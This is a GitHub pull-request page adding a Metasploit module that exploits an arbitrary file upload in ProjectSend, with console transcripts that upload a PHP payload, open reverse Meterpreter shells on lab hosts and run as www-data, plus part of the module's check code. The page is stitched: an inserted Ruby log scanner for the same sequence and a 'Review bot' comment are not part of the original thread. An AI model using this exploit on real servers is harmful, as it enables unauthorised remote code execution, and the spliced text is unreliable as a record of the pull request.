Add ProjectSend Arbitrary File Upload module #4459

Merged
merged 1 commit into from Dec 26, 2014

@bcoles
Contributor
bcoles commented Dec 23, 2014

Add ProjectSend Arbitrary File Upload module

Check

msf > use exploit/unix/webapp/projectsend_upload_exec
msf exploit(projectsend_upload_exec) > set RHOST 10.6.6.55
RHOST => 10.6.6.55
msf exploit(projectsend_upload_exec) > check
[*] 10.6.6.55:80 - The target is not exploitable.
msf exploit(projectsend_upload_exec) > set verbose true
verbose => true
msf exploit(projectsend_upload_exec) > set targeturi /ProjectSend-r561/ 
targeturi => /ProjectSend-r561/
msf exploit(projectsend_upload_exec) > check
[+] 10.6.6.55:80 - The target is vulnerable.

Run

msf exploit(projectsend_upload_exec) > run

[*] Started reverse handler on 10.6.6.66:4444 
[*] 10.6.6.55:80 - Uploading file 'YA577D9ea8L44gf.php' (1796 bytes)
[+] 10.6.6.55:80 - Payload uploaded successfully (YA577D9ea8L44gf.php)
[*] 10.6.6.55:80 - Executing upload/files/YA577D9ea8L44gf.php...
[*] Sending stage (40551 bytes) to 10.6.6.55
[*] Meterpreter session 1 opened (10.6.6.66:4444 -> 10.6.6.55:58917) at 2014-12-20 13:25:45 -0500
[+] Deleted YA577D9ea8L44gf.php
^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: www-data (33)
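A defender's view of the sequence shown in the transcript above, as an added example that is not part of the pull request or the ProjectSend module: a small Ruby script that scans web-server access-log lines for a POST to process-upload.php followed, from the same client, by a request for a .php file under upload/files/. The combined-style log format and the sample lines are constructed for the example.

```ruby
# Added example (not part of the ProjectSend module or this pull request).
# Flags clients that POST to process-upload.php and then fetch a .php file
# under upload/files/, the two-step sequence visible in the module output.
require 'time'

# Constructed sample lines in Apache combined-style format (not real traffic).
SAMPLE_LOG = <<~LOG
  10.6.6.66 - - [20/Dec/2014:13:25:44 -0500] "POST /ProjectSend-r561/process-upload.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
  10.6.6.66 - - [20/Dec/2014:13:25:45 -0500] "GET /ProjectSend-r561/upload/files/YA577D9ea8L44gf.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  10.6.6.10 - - [20/Dec/2014:13:26:01 -0500] "POST /ProjectSend-r561/process-upload.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
  10.6.6.10 - - [20/Dec/2014:13:26:02 -0500] "GET /ProjectSend-r561/upload/files/report.pdf HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
LOG

LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

# Parse one access-log line into a hash, or return nil if it does not match.
def parse_line(line)
  m = LINE_RE.match(line)
  return nil unless m
  { ip: m[:ip], time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: m[:path], status: m[:status].to_i }
end

# Return one alert per request for a .php file under upload/files/ whose client
# POSTed to process-upload.php within the preceding `window` seconds.
def find_upload_exec(log, window: 300)
  uploads = Hash.new { |h, k| h[k] = [] }
  alerts = []
  log.each_line.map { |l| parse_line(l) }.compact.each do |e|
    if e[:method] == 'POST' && e[:path].end_with?('/process-upload.php')
      uploads[e[:ip]] << e[:time]
    elsif e[:method] == 'GET' && e[:path] =~ %r{/upload/files/[^/]+\.php\z}i
      recent = uploads[e[:ip]].any? { |t| (e[:time] - t).between?(0, window) }
      alerts << { ip: e[:ip], path: e[:path], time: e[:time] } if recent
    end
  end
  alerts
end

if __FILE__ == $PROGRAM_NAME
  find_upload_exec(SAMPLE_LOG).each do |a|
    puts "#{a[:time].iso8601} #{a[:ip]} upload followed by request for #{a[:path]}"
  end
end
```

Feed it a real access log by replacing SAMPLE_LOG with `File.read(path)`; the PDF request from the second client is not flagged because only .php files under upload/files/ count as execution.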
@wchen-r7 wchen-r7 commented on the diff Dec 23, 2014
modules/exploits/unix/webapp/projectsend_upload_exec.rb
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, 'process-upload.php')
+ )
+ if !res
+ vprint_error("#{peer} - Connection timed out")
+ return Exploit::CheckCode::Unknown
+ elsif res.code.to_i == 404
+ vprint_error("#{peer} - No process-upload.php found")
+ return Exploit::CheckCode::Safe
+ elsif res.code.to_i == 500
+ vprint_error("#{peer} - Unable to write file")
+ return Exploit::CheckCode::Safe
+ elsif res.code.to_i == 200 && res.body =~ /<\?php/
+ vprint_error("#{peer} - File process-upload.php is not executable")
+ return Exploit::CheckCode::Safe
+ elsif res.code.to_i == 200 && res.body =~ /sys.config.php/
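Review bot: the `/sys.config.php/` match on the last visible line leaves both dots unescaped, so they match any character; write it as `/sys\.config\.php/` so the check keys on the literal filename. Separately, the `res.code.to_i == 500` branch returns `Exploit::CheckCode::Safe` with the message "Unable to write file", but a 500 can come from any server-side error unrelated to the upload directory being unwritable, so `Exploit::CheckCode::Unknown` would describe that outcome more honestly than Safe.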
@wchen-r7
wchen-r7 Dec 23, 2014 Contributor

Is this supposed to be /sys\.config\.php/ or actually /sys.config.php/ ?

@bcoles
bcoles Dec 23, 2014 Contributor

The former; /sys\.config\.php/

@wchen-r7 wchen-r7 added the module label Dec 24, 2014
@jvazquez-r7 jvazquez-r7 self-assigned this Dec 26, 2014
@jvazquez-r7
Contributor

testing...

@jvazquez-r7 jvazquez-r7 merged commit 5c82b8a into rapid7:master Dec 26, 2014

1 check passed

continuous-integration/travis-ci The Travis CI build passed
@jvazquez-r7 jvazquez-r7 added a commit that referenced this pull request Dec 26, 2014
@jvazquez-r7 jvazquez-r7 Land #4459, @bcoles's ProjectSend Arbitrary File Upload module 2bed52d
@jvazquez-r7
Contributor

Did minor cleanup here: b5b0be9

Test:

msf exploit(projectsend_upload_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.137:80 - Uploading file 'xozXXw1.php' (1794 bytes)
[+] 172.16.158.137:80 - Payload uploaded successfully (xozXXw1.php)
[*] 172.16.158.137:80 - Executing upload/files/xozXXw1.php...
[*] Sending stage (40499 bytes) to 172.16.158.137
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.137:38949) at 2014-12-26 11:23:44 -0600
[+] Deleted xozXXw1.php
[*] 172.16.158.137:80 - Request timed out while executing

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686
Meterpreter : php/php
meterpreter > exit
[*] Shutting down Meterpreter...

thanks @bcoles ! landed

@bcoles bcoles deleted the bcoles:projectsend_upload_exec branch May 5, 2015